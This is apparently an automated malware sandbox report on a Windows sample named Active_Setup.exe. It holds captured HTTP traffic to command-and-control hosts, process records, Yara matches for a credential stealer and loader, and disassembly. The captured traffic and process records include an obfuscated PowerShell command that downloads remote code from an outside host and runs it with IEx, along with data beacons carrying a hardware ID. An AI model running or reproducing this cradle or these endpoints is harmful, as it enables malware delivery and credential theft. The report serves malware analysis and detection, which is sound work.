                                                                                                                                                2024-12-30 17:19:23 UTC15331OUTData Raw: 2d 2d 58 54 49 33 52 53 38 32 50 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 44 39 44 35 38 39 31 34 33 41 39 36 44 44 43 32 38 33 33 36 37 35 46 46 38 35 46 38 33 44 0d 0a 2d 2d 58 54 49 33 52 53 38 32 50 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 54 49 33 52 53 38 32 50 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 58 54 49 33 52 53 38 32 50 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                                                                Data Ascii: --XTI3RS82PTContent-Disposition: form-data; name="hwid"ADD9D589143A96DDC2833675FF85F83D--XTI3RS82PTContent-Disposition: form-data; name="pid"1--XTI3RS82PTContent-Disposition: form-data; name="lid"hRjzG3--ZINA--XTI3RS82PTContent-D
                                                                                                                                                2024-12-30 17:19:23 UTC15331OUTData Raw: ab af d8 7d a6 23 be 02 03 52 cc 09 80 6f 83 67 31 0f bf b1 f3 28 df 6c c4 e1 6f b0 38 e3 f2 ff 19 01 e4 21 15 78 e4 b7 21 b8 1f c4 19 52 73 fd 00 33 97 0f 9c 86 03 22 43 70 dc a3 b2 b5 0e 7e 33 fb 31 1b 8a 21 2b c5 bc 28 5f fa ec 5a ca ef bc a9 96 11 08 da cb b7 e7 ac f5 81 d6 b6 4b de cf e3 bc 9e 57 8b 78 7a e0 08 6d e2 cd d1 1a 0d 5c 8e 7b 4d b2 5a fe e5 1f f8 81 30 49 74 eb 7d 0a 73 91 3d f3 e5 af 6d ed 58 4a 79 9c 82 79 de 37 dc 19 cd f4 46 1f 65 d0 f9 84 1e f8 5e b9 56 49 24 8c 6d e6 bc bb 34 68 d5 b4 93 df 83 a6 9c 0c 31 49 59 be da be f8 b7 18 8e 48 50 bd 89 58 98 90 b8 ad 19 3d 6a 2a 97 d5 1f 86 c8 9b 5c be 0e b6 39 df 2d ed bf ca 57 f7 f1 e7 80 a4 a5 11 e6 c4 69 e7 5d 4f 52 51 ff a1 d8 ba 0a a5 6b 2d d4 0c 2a c5 0d fd 46 28 1f 93 e4 73 26 f1 99
                                                                                                                                                Data Ascii: }#Rog1(lo8!x!Rs3"Cp~31!+(_ZKWxzm\{MZ0It}s=mXJyy7Fe^VI$m4h1IYHPX=j*\9-Wi]ORQk-*F(s&
                                                                                                                                                2024-12-30 17:19:23 UTC15331OUTData Raw: 36 f0 72 61 77 70 12 3e d8 4b b4 dc e1 2b bd fe ab ff f5 b7 36 55 ee 11 35 35 85 92 60 a8 38 c4 14 62 cc e6 e2 c1 b6 1d ff 6a b1 d4 ba 08 c4 20 fd 77 e4 fa fc 4b 90 34 f3 df 21 d6 b9 d9 1a de 80 46 42 02 88 53 e4 ff 6b d0 b4 54 7f 9f a8 09 44 c0 61 0c ef e4 9e dd 7d 40 7a 3f 4d 15 81 e3 eb d7 f7 c9 36 ca 24 43 d5 ab 3b eb fa e5 2a a5 c0 62 e3 0d c8 57 f4 59 fa 71 35 d1 f6 8f e8 2b d9 f7 79 7b fe 02 8a 60 5c 3d e1 e7 f1 3f 6d 05 91 75 c8 81 16 6f fd 41 90 82 cb 8c f1 e9 51 88 16 8e 0e 80 8f 2d a8 14 71 e4 d7 75 35 3c 71 57 0d 98 84 dd 84 07 9c 20 22 f8 30 15 f1 9a 54 a0 e5 91 bb b7 41 67 4b fe 14 a9 78 be 76 0d 5f 6a 92 de 93 8a 18 29 21 73 99 b0 12 b0 77 80 45 4c dc 47 f2 e6 14 30 23 90 40 f6 ea f1 64 7e fd 46 ba 04 34 a1 5d 4b 6e 50 af a3 c4 af 22 bd 6f
                                                                                                                                                Data Ascii: 6rawp>K+6U55`8bj wK4!FBSkTDa}@z?M6$C;*bWYq5+y{`\=?muoAQ-qu5<qW "0TAgKxv_j)!swELG0#@d~F4]KnP"o
                                                                                                                                                2024-12-30 17:19:23 UTC15331OUTData Raw: b1 b2 e2 65 4d 26 12 87 08 b7 d0 b7 8f 93 6f e4 a6 01 ba 1a 91 4a 43 93 f9 51 bc 4a c0 03 8b 5d 3f a6 61 a9 82 77 ca 31 c1 82 a7 50 38 e2 00 d7 f0 e0 20 ce a3 44 e5 c5 2c fb a1 c9 47 1e d8 79 f2 ed 9b d7 7f e8 ba 59 ce 0f a1 47 3a 2f ce 01 e2 15 88 a8 30 94 8f 02 ae 6d 05 4f 9e c0 a5 a0 5e ff bf 53 6b 6d 2e 58 ab b7 ef d7 1b b4 ed c2 f5 eb b1 c8 3b b3 d5 be bc 66 c5 a7 dc aa bd 30 5e bc 2b f2 0b c5 59 a2 7e 96 5e 0d 01 89 38 c8 6d 72 ef ba 15 4f 80 3c 70 fe 3e 47 8a a8 c1 0d c5 95 a2 76 e5 ed d2 c3 7e 97 10 78 8d a6 77 0a 90 75 59 ea 2b 42 16 b5 a4 54 51 9c 08 78 23 aa 6e 09 32 1b 42 5c 01 61 a8 60 6e 58 4e 6c a4 5a eb 19 43 5f 48 fd 9f 88 17 87 48 2d 00 b3 88 66 c7 e9 a1 76 82 83 8b 3f dd d3 d1 eb 07 f6 ef de 88 fb 9d 50 43 e6 e7 5c 22 14 34 2d 65 fb 72
                                                                                                                                                Data Ascii: eM&oJCQJ]?aw1P8 D,GyYG:/0mO^Skm.X;f0^+Y~^8mrO<p>Gv~xwuY+BTQx#n2B\a`nXNlZC_HH-fv?PC\"4-er
                                                                                                                                                2024-12-30 17:19:23 UTC15331OUTData Raw: 4a 1e b8 cc 97 5f 7a 20 c1 29 04 f5 8f 60 22 be 79 44 08 65 5c c1 01 1c 02 cf 5e 09 cc ea 73 2b 02 81 d0 46 68 21 c3 1f 06 f5 43 23 23 03 e1 30 bf 75 8d 5e 7e 86 45 53 63 20 dd 9c f6 fb 04 d9 f4 e8 f1 f0 8c 08 ed 0a ae 8a 37 42 61 f5 ad 92 35 d9 2a e0 cc a4 3c 44 74 e3 5b 1e 40 e2 11 81 d2 b7 7c 4d fc 35 0c db 22 35 d7 2a 7d 6e 92 26 9a 0f 48 0a 4f 38 19 eb 73 a7 30 67 26 2f ee 5f cf 1d 52 c7 0c 07 3e 1a 1c 0e 3e b6 a0 dc 5d c4 68 d5 16 b3 d3 96 6a 5e 08 66 5c 3b 4e 16 5b 7f ad 69 3b 2c df ba 28 69 5f 1f a6 21 da 56 ce 09 e3 a6 08 0a 8c 04 61 40 30 06 c6 d8 06 fd bb 04 e8 23 0b 46 62 c0 36 9a 56 75 ae d8 29 06 13 8e 48 b7 08 d1 f7 b2 6b a6 7e 12 1a 97 2a 78 9d f3 36 1e 6d 7f 5e 80 b9 2a 7c d0 2e 54 d5 6f cb 28 d6 31 17 ef ff ad a2 f8 ff be 20 38 1b 09 8f
                                                                                                                                                Data Ascii: J_z )`"yDe\^s+Fh!C##0u^~ESc 7Ba5*<Dt[@|M5"5*}n&HO8s0g&/_R>>]hj^f\;N[i;,(i_!Va@0#Fb6Vu)Hk~*x6m^*|.To(1 8
                                                                                                                                                2024-12-30 17:19:23 UTC15331OUTData Raw: 8b a7 27 b3 34 f0 d0 5c cc b8 75 6e 5d 04 cf 25 2c 85 ad 75 81 6e 0e 21 e1 19 c9 8f af c4 fb 22 a9 06 08 ac 91 8a 5f b7 0c 99 5f 5d d6 2d 18 43 4a 20 42 b5 9f 4f 80 18 ee e9 82 4c d2 79 18 f9 7c 17 0e 76 79 54 0f 98 a9 f8 c8 f2 76 93 83 a4 73 80 fd 7e b6 38 6b 09 a4 b6 51 2a d6 02 67 c1 69 30 e5 ae 28 06 34 af 98 52 77 c0 c6 a0 56 66 e5 c0 03 e5 bb 9b 03 ba 18 22 aa 42 4d c6 3d af 17 61 b2 29 63 ac 5b 65 67 81 fc 1f 14 30 27 6d 5a d3 46 0a da 77 1d e1 41 9b 83 12 2a 21 da 84 a1 39 0e 18 c6 c3 2d 48 60 f9 08 ee 12 05 bb cb 96 85 e9 ed c6 bd e2 a0 6c f3 f6 de 00 14 d0 60 3f d1 44 54 16 6a 15 11 a2 e7 74 4a 32 a0 be 83 e3 c5 aa e0 34 c3 fd c3 c6 fa 61 c7 c1 8d a6 0f 29 87 c7 d9 8f 2a 53 54 94 a9 59 06 7f 14 fa 8e 0e 85 f5 88 b6 1e 48 af 0f a3 50 eb 70 99 b6
                                                                                                                                                Data Ascii: '4\un]%,un!"__]-CJ BOLy|vyTvs~8kQ*gi0(4RwVf"BM=a)c[eg0'mZFwA*!9-H`l`?DTjtJ24a)*STYHPp
                                                                                                                                                2024-12-30 17:19:23 UTC15331OUTData Raw: fc 5c 1c 2d 07 55 6b f4 36 4b 2a 6e 67 7a d3 62 8b 2c fc 68 c2 05 a6 b4 61 9b 22 b8 83 92 e0 d0 dc 43 40 ba 39 35 6d f7 f4 ad cb 75 c7 15 65 ca 1b 75 35 40 37 4f 10 7e e7 31 7a 1a 4d 7f bb 31 6a 99 db df 3b c6 ff dd 16 fa a2 4e b8 ce 19 22 33 b2 02 f8 ef 99 1b f6 23 49 8b fc 7c 1f 61 fa bc 75 f8 9e 82 21 ee 5f 38 de 71 5d c0 8e 51 46 fc 84 f8 54 af 20 db 16 b0 bf cb 12 81 46 47 ee 1e 12 3f e3 30 57 9a d5 a5 86 aa a1 b4 40 7d f2 e0 d0 47 5c d2 41 2f 43 ed 1e c5 3e c7 b2 1d a1 67 64 49 7d 13 b8 f4 3a dd ce af 9c a1 f2 83 91 48 cb 31 4c d5 03 d2 73 d6 4f ab 2b 0d a4 69 5c fe 76 8d e1 11 24 93 44 61 85 7b 20 b4 9b a8 10 8a 88 02 27 06 c5 6e dd b5 18 3f 2a 72 48 fc e8 ea b3 f9 86 50 05 92 57 93 76 89 09 85 17 1a ba 7c f7 ec 67 5f c6 cc 26 6f 2d 41 61 14 2e 83
                                                                                                                                                Data Ascii: \-Uk6K*ngzb,ha"C@95mueu5@7O~1zM1j;N"3#I|au!_8q]QFT FG?0W@}G\A/C>gdI}:H1LsO+i\v$Da{ 'n?*rHPWv|g_&o-Aa.
                                                                                                                                                2024-12-30 17:19:23 UTC15331OUTData Raw: 19 d2 06 d9 67 30 1c 23 a3 db 7f 22 8c 5e eb fa c8 6c 27 83 28 00 ca 4b c7 cb cb 0d bc e2 00 3e 78 41 bb 3e 5c da d1 8f 33 95 71 19 10 fa fd 82 d3 dd 8c 3f eb b6 d7 b5 1b 15 af 67 a8 70 65 ce 91 f4 b7 ec 2d 17 b5 ae d2 b8 c1 1f 82 45 b7 5a b9 7c e7 d8 da 31 73 48 4a 66 a5 ca a6 3d 3b 7d d2 d6 fb 2a d0 a7 a5 1f cd 68 0d cd a7 a9 73 13 82 77 a5 4f d9 c0 71 f0 df 94 fe 6f 3d 83 37 0d 01 a1 00 ea c1 4b 1a db 70 84 83 9d bf ad 8d 7f a0 67 07 6d bc 2e 08 da 1a 3b c9 a9 62 1e dc 41 3e 96 df c5 e6 f4 1a 0b c4 28 65 0e be 97 03 5a 47 68 d7 3f a7 e5 2a b6 dc 0e d0 7e 1c fe f9 8e f1 2d 2d 30 5d 12 d5 80 a8 f4 3e 71 24 08 13 65 2d 00 6e a1 d0 bc 4b a7 9c 09 93 a2 c3 ae 52 32 bb ea f2 bd ba a5 fe 26 79 4a 8d 09 9a 94 61 20 e1 7a 03 b0 63 dc 9b fa 1d 20 4f 38 c2 5e 14
                                                                                                                                                Data Ascii: g0#"^l'(K>xA>\3q?gpe-EZ|1sHJf=;}*hswOqo=7Kpgm.;bA>(eZGh?*~--0]>q$e-nKR2&yJa zc O8^
                                                                                                                                                2024-12-30 17:19:23 UTC15331OUTData Raw: cf fa 02 9e 8a 28 75 a9 40 68 ec 79 c7 aa 97 c5 1d 36 84 eb 5b 88 7b 0e 72 c7 7c 41 bd 3a a3 6f 21 66 3d 0c a6 c1 a1 17 16 c3 55 fa e0 c3 b2 2d 13 54 2a 76 d6 9f 86 0a c3 41 92 a8 f3 ab 95 3a 47 c2 64 b6 46 03 cb 06 b8 35 ba 23 89 84 8e 36 c4 a5 de 42 3f be 8b 42 20 a9 cd a4 f1 f6 ba b1 53 53 60 aa cc 9e 62 94 d9 3d 0b e1 0d 89 d5 bd d2 ef 0a 88 5e a2 c2 5a 56 7d 61 51 61 93 b8 77 e6 6d 98 23 6e 5a 57 30 e7 a1 d8 c5 2b 2e 11 c6 bc 2a fd 6e 96 5e a6 a3 b9 04 7f 6e 3f 8c f0 98 4e 8e 67 74 d7 6f d6 ee 9d e0 39 76 c5 54 18 15 4a 5d 9f 19 a2 ef 86 95 66 79 75 4a b1 65 e9 d3 6e da 19 00 47 85 99 ad 79 c3 d7 f5 26 b2 03 e2 37 ad 74 db b3 19 52 9c ab 06 d4 6b 6d 84 ae 1e b6 c7 51 ac ae c2 65 55 3d 70 49 bb 30 6d 30 59 75 9c a9 3f be 7e 26 2a 34 40 64 40 28 59 e9
                                                                                                                                                Data Ascii: (u@hy6[{r|A:o!f=U-T*vA:GdF5#6B?B SS`b=^ZV}aQawm#nZW0+.*n^n?Ngto9vTJ]fyuJenGy&7tRkmQeU=pI0m0Yu?~&*4@d@(Y
                                                                                                                                                2024-12-30 17:19:23 UTC15331OUTData Raw: 47 e4 c0 3b 19 3d 24 78 da 27 9a 6e 1e f2 63 bb 65 7f b2 c9 d5 ad 1f cf 84 35 c0 c9 75 3b 75 fe cf 00 c7 d5 4a 58 22 ae 90 17 e8 ac dd f6 ba 75 d7 f9 28 f5 07 12 ed 57 7b eb 5d 92 1c f8 2d 77 4a 17 f7 bc 4e 1c c2 71 55 02 aa a4 6f 7e 54 49 78 8b 21 da d6 a0 b0 83 ca bb d1 c7 f6 1a c1 8e 90 6c 15 38 5c 7f 3d 2d cc 4d a5 71 b7 09 ef e9 d1 77 9d f8 bc a8 a1 98 f9 ab 66 69 1d e2 b7 88 42 9f 1d a8 5d c9 a1 03 77 e4 36 ec af ad 7d 14 c1 73 5f d0 45 69 18 c3 43 82 4a 8a 09 96 d9 82 af 8f 6a 7d 8a 7e b3 c9 3e 52 ec 01 65 3b 79 a9 4b 7b 51 29 2e d8 b9 f1 62 e1 bb ce cd 91 bc 2c 0c c7 cd 4c 7a 1a 03 e1 e6 5c 9b b1 e3 6b 6f 6b a2 8f 60 f5 5b b9 9d 4e 06 8a 6b b5 71 a4 2a 3e 7c 62 b0 86 5e 9b d8 1c 8d 30 6c f2 37 8b e0 5d 5d 91 8f 89 ec 91 cf 0b 6b 62 f9 97 67 99 1a
                                                                                                                                                Data Ascii: G;=$x'nce5u;uJX"u(W{]-wJNqUo~TIx!l8\=-MqwfiB]w6}s_EiCJj}~>Re;yK{Q).b,Lz\kok`[Nkq*>|b^0l7]]kbg
                                                                                                                                                2024-12-30 17:19:24 UTC1139INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 30 Dec 2024 17:19:24 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=qnlkp03kecoo3trl1f5ongvgic; expires=Fri, 25 Apr 2025 11:06:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ei4B3XlwPmSEqD%2FUlQ2r5Mf2ycufoHiMxyjKH1tFisizWJEYqo2IIlJSXmAxu0h6ToGBwTIV4AgW%2BHBsiOAjes1YlS4OTi8uOi2SM7wNlQv9mHRjAxbZ8M75SHa%2BY%2B3Jq8oNTw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa3b1ca4eac1a48-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2018&min_rtt=2013&rtt_var=766&sent=340&recv=590&lost=0&retrans=0&sent_bytes=2843&recv_bytes=571467&delivery_rate=1417475&cwnd=157&unsent_bytes=0&cid=a9c5030a234b9d77&ts=1635&x=0"


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                8192.168.2.449744188.114.97.34437532C:\Users\user\Desktop\Active_Setup.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-30 17:19:25 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 113
                                                                                                                                                Host: cryofficesj.click
                                                                                                                                                2024-12-30 17:19:25 UTC113OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37 26 68 77 69 64 3d 41 44 44 39 44 35 38 39 31 34 33 41 39 36 44 44 43 32 38 33 33 36 37 35 46 46 38 35 46 38 33 44
                                                                                                                                                Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--ZINA&j=637b55279021aab33278188cfa638397&hwid=ADD9D589143A96DDC2833675FF85F83D
                                                                                                                                                2024-12-30 17:19:25 UTC1134INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 30 Dec 2024 17:19:25 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=lihri6af19mldtqo2g630qrjih; expires=Fri, 25 Apr 2025 11:06:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uW5shRFQlV4k7P8Adlw50PIHAg9b08tdvi9jeAa3%2F4IhCIM3ZgcBhnQoxu4fbXHXt81%2BU9ReN8edve99Ze%2BNnbsYCeQZwWU%2FAGTmb7Cs%2BOIf63s60tWzsjph9aGfk55VAIHVkw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa3b1d78d8ede99-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1520&min_rtt=1518&rtt_var=574&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1015&delivery_rate=1898569&cwnd=213&unsent_bytes=0&cid=153797e1666ca496&ts=501&x=0"
                                                                                                                                                2024-12-30 17:19:25 UTC218INData Raw: 64 34 0d 0a 50 2b 6c 4c 77 6b 79 2f 64 55 49 2f 49 63 67 4d 34 4f 74 52 34 72 33 51 61 58 4a 70 46 77 37 55 70 6f 65 4b 47 73 70 43 78 77 46 6b 6b 6d 6d 33 62 6f 56 58 4b 6b 74 56 75 48 2f 61 74 33 36 2b 6b 72 4d 4d 46 52 77 35 66 62 7a 4a 39 39 59 31 38 6e 66 77 4e 51 33 66 65 66 5a 34 69 53 6c 74 54 30 6e 6d 65 4a 69 66 63 38 36 66 74 68 31 51 55 79 55 69 39 73 4f 6c 73 43 75 33 62 72 77 6a 53 73 74 78 34 43 54 4c 41 54 4a 4d 47 35 51 6a 76 4d 51 36 6a 74 53 67 48 77 63 45 66 6e 32 68 7a 36 6e 35 63 71 55 79 6d 79 35 57 68 7a 2b 64 4c 39 4d 46 48 55 78 4a 71 53 4b 55 6b 79 58 41 6b 66 49 50 42 6b 73 74 50 76 69 45 34 71 67 67 2b 6a 2b 61 0d 0a
                                                                                                                                                Data Ascii: d4P+lLwky/dUI/IcgM4OtR4r3QaXJpFw7UpoeKGspCxwFkkmm3boVXKktVuH/at36+krMMFRw5fbzJ99Y18nfwNQ3fefZ4iSltT0nmeJifc86fth1QUyUi9sOlsCu3brwjSstx4CTLATJMG5QjvMQ6jtSgHwcEfn2hz6n5cqUymy5Whz+dL9MFHUxJqSKUkyXAkfIPBkstPviE4qgg+j+a
                                                                                                                                                2024-12-30 17:19:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                9192.168.2.449745185.161.251.214437532C:\Users\user\Desktop\Active_Setup.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-30 17:19:26 UTC201OUTGET /8574262446/ph.txt HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Host: cegu.shop
                                                                                                                                                2024-12-30 17:19:26 UTC249INHTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.26.2
                                                                                                                                                Date: Mon, 30 Dec 2024 17:19:26 GMT
                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                Content-Length: 329
                                                                                                                                                Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                                                                Connection: close
                                                                                                                                                ETag: "676c9e2a-149"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                2024-12-30 17:19:26 UTC329INData Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
                                                                                                                                                Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


                                                                                                                                                Statistics

                                                                                                                                                CPU Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                Memory Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                Behavior

                                                                                                                                                Click to jump to process

                                                                                                                                                System Behavior

                                                                                                                                                General

                                                                                                                                                Target ID:0
                                                                                                                                                Start time:12:19:01
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Users\user\Desktop\Active_Setup.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\Active_Setup.exe"
                                                                                                                                                Imagebase:0xfb0000
                                                                                                                                                File size:76'054'693 bytes
                                                                                                                                                MD5 hash:B106A3A66916985D5E5B6CBBB6C5B07C
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1860274897.0000000000BD4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:4
                                                                                                                                                Start time:12:19:26
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ;
                                                                                                                                                Imagebase:0x550000
                                                                                                                                                File size:433'152 bytes
                                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:5
                                                                                                                                                Start time:12:19:26
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Disassembly

                                                                                                                                                Reset < >

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:0.4%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:33.1%
                                                                                                                                                  Signature Coverage:18%
                                                                                                                                                  Total number of Nodes:278
                                                                                                                                                  Total number of Limit Nodes:25
                                                                                                                                                  execution_graph 126147 109e3b0 CreateMutexW GetLastError 126150 1080748 126147->126150 126153 108070c 126150->126153 126152 1080755 126154 1080718 __getstream 126153->126154 126161 1084e58 126154->126161 126160 1080739 __getstream 126160->126152 126187 108b9f1 126161->126187 126163 108071d 126164 1080621 126163->126164 126196 1087680 TlsGetValue 126164->126196 126167 1087680 __decode_pointer 6 API calls 126168 1080645 126167->126168 126179 10806c8 126168->126179 126206 108b2df 68 API calls 6 library calls 126168->126206 126170 1080663 126173 108068d 126170->126173 126174 108067e 126170->126174 126183 10806af 126170->126183 126171 1087605 __encode_pointer 6 API calls 126172 10806bd 126171->126172 126175 1087605 __encode_pointer 6 API calls 126172->126175 126177 1080687 126173->126177 126173->126179 126207 108b23f 73 API calls _realloc 126174->126207 126175->126179 126177->126173 126180 10806a3 126177->126180 126208 108b23f 73 API calls _realloc 126177->126208 126184 1080742 126179->126184 126209 1087605 TlsGetValue 126180->126209 126181 108069d 126181->126179 126181->126180 126183->126171 126221 1084e61 126184->126221 126188 108ba19 EnterCriticalSection 126187->126188 126189 108ba06 126187->126189 126188->126163 126194 108b92e 67 API calls 8 library calls 126189->126194 126191 108ba0c 126191->126188 126195 1084dec 67 API calls 3 library calls 126191->126195 126193 108ba18 126193->126188 126194->126191 126195->126193 126197 1087698 126196->126197 126198 10876b9 GetModuleHandleW 126196->126198 126197->126198 126199 10876a2 TlsGetValue 126197->126199 126200 10876c9 126198->126200 126201 10876d4 GetProcAddress 126198->126201 126205 